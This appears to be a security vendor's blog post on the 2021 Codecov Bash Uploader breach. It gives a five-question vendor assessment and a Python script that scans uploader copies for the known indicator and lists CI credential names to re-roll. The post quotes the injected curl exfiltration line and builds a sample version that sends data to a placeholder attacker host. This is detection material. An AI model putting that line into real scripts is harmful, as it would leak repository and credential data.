In my previous post, we discussed the Codecov breach and its potential impact on enterprises worldwide. By way of background, on April 15, 2021 Codecov warned its customers that hackers had introduced a backdoor in the Bash Uploader script starting on January 31, 2021. The hackers exploited a flawed Docker image creation process to replace Codecov’s IP address with theirs. This exploit allowed them to post users’ information to their servers.
With approximately 29,000 companies using Codecov’s development tools, it is possible that some of your third parties are too. Therefore, it is essential that you assess the potential impact to your third parties so you can mitigate the possible exposure of your company’s data. Prevalent has curated a 5-question assessment that can be leveraged to rapidly identify any potential impacts to your business by determining which of your third parties was affected and what actions they are taking.
| Questions | Potential Responses |
|---|---|
| 1) Does the organization utilize any of the following uploaders? (Please select all that apply.) Help text: Specified uploaders relate only to Codecov. | a) Codecov-actions uploader for GitHub |
| 2) If so, has the organization been impacted by the recent Codecov supply chain attack? (Please select one.) Help text: Significant impact: The cyber attack has caused systems or infrastructure to stop working or become unavailable. There has been a loss of confidentiality or integrity of data. High impact: Service availability has been periodically lost, and there is the potential for some systems to periodically stop. Some loss of confidentiality or integrity of data. Low impact: No loss of confidentiality or integrity of data; minimal or no disruption to service availability. | a) There has been significant impact. |
| 3) Following the guidance of Codecov, has the organization taken the following actions? (Please select all that apply.) Help text: Organizations can determine the keys and tokens that are surfaced to the CI environment by running the `env` command in the organization's CI pipeline. If anything returned from that command is considered private or sensitive, Codecov recommends invalidating the credential and generating a new one. | a) Re-roll of all credentials located in the environment variables in our CI processes that used one of Codecov's Bash Uploaders. |
| 4) Has the organization replaced the bash files used with the most recent version available from Codecov? (Please select one.) Help text: Any organization that uses a locally stored version of a Bash Uploader should check that version for the following: `curl -sm 0.5 -d "$(git remote -v)`. If this appears anywhere in the locally stored Bash Uploader, the organization should immediately replace the bash files with the most recent version from https://codecov.io/bash | a) Yes, we have updated our version of Bash files with the most recent from Codecov. |
| 5) Has the supply chain attack exposed any customer sensitive information? (Please select all that apply.) Help text: Customer sensitive information is defined as any material that can have a detrimental impact to the customer if exposed to unauthorized parties. Impacts can vary from, but are not limited to, reputational damage, financial penalties, loss of earnings, or loss of competitive advantage. | a) Yes, an ongoing investigation is identifying the level of exposure. |
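The help text for questions 3 and 4 describes two concrete checks a respondent can run: search any locally stored copy of the Bash Uploader for the injected `curl -sm 0.5 -d "$(git remote -v)` line, and inventory which credentials the CI environment exposes so they can be re-rolled. The script below is an added example, not Prevalent's assessment tooling or Codecov's own code; the sample uploader excerpts and the sample environment are constructed for illustration, and the secret-name pattern is an assumed heuristic rather than anything Codecov published.

```python
"""Two defender-side checks from the Codecov guidance: uploader tampering and exposed CI secrets."""
import os
import re
from pathlib import Path

# Indicator of compromise quoted in the guidance: the injected line began with this fragment.
INDICATOR = 'curl -sm 0.5 -d "$(git remote -v)'

# Constructed sample excerpts (not real Codecov uploader files) for a stand-alone run.
CLEAN_SAMPLE = """#!/usr/bin/env bash
# Codecov Bash Uploader (constructed excerpt)
curl -X POST --data-binary @report.txt "$url/upload/v4"
"""
TAMPERED_SAMPLE = CLEAN_SAMPLE + 'curl -sm 0.5 -d "$(git remote -v)<<<placeholder" http://EXAMPLE-ATTACKER-HOST/ || true\n'

# Assumed heuristic: environment variable names that usually hold credentials.
SECRET_NAME_PATTERN = re.compile(
    r"(TOKEN|SECRET|PASSWORD|PASSWD|API_KEY|ACCESS_KEY|PRIVATE_KEY|CREDENTIAL)", re.IGNORECASE
)


def normalize_quotes(text: str) -> str:
    """Map typographic quotes to ASCII so a copy pasted from a web page still matches."""
    return text.replace("\u201c", '"').replace("\u201d", '"').replace("\u2018", "'").replace("\u2019", "'")


def uploader_is_tampered(text: str) -> bool:
    """True if the known indicator appears anywhere in the uploader text (CRLF and quote-safe)."""
    return INDICATOR in normalize_quotes(text.replace("\r\n", "\n"))


def scan_uploader_file(path: Path) -> bool:
    """Read a locally stored uploader and report whether it carries the indicator."""
    return uploader_is_tampered(path.read_text(encoding="utf-8", errors="replace"))


def suspect_env_names(env: dict) -> list:
    """Return the names (never the values) of variables that look like credentials to re-roll."""
    return sorted(name for name in env if SECRET_NAME_PATTERN.search(name))


if __name__ == "__main__":
    # Check 1: the injected curl line in a locally stored uploader.
    print("constructed clean sample tampered?   ", uploader_is_tampered(CLEAN_SAMPLE))
    print("constructed tampered sample tampered?", uploader_is_tampered(TAMPERED_SAMPLE))
    # Check 2: which variables in this process's environment would have been surfaced to the uploader.
    for name in suspect_env_names(dict(os.environ)):
        print("candidate credential to re-roll:", name)
```

Run the file inside the CI job itself (the same context in which `env` would have been run) so the second check sees the job's real variables; it prints only names, so the output can be attached to a ticket without copying secret values into logs. A positive result from the first check is a reason to replace the file from https://codecov.io/bash and treat every variable listed by the second check as compromised.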
Prevalent recently introduced the Third-Party Incident Response Service, a solution that helps to rapidly identify and mitigate the impact of supply chain breaches like the Codecov attack by providing a platform to centrally manage vendors, conduct targeted event-specific assessments, score identified risks, and access remediation guidance. Prevalent offers this solution as a managed service to enable your team to offload the collection of critical response data so they can focus on remediating risks instead.
Complementing the Incident Response Service is Prevalent’s continuous cyber and business breach monitoring that provides regular updates on breach disclosures, adverse news events, and cyber incidents such as malicious dark web activity about your vendors.
Together, these solutions help to automate breach impact discovery and accelerate response.
Use this questionnaire to determine the impact the Codecov attack could have on your supplier ecosystem. Learn more by downloading a best practices white paper or contact us for a demo!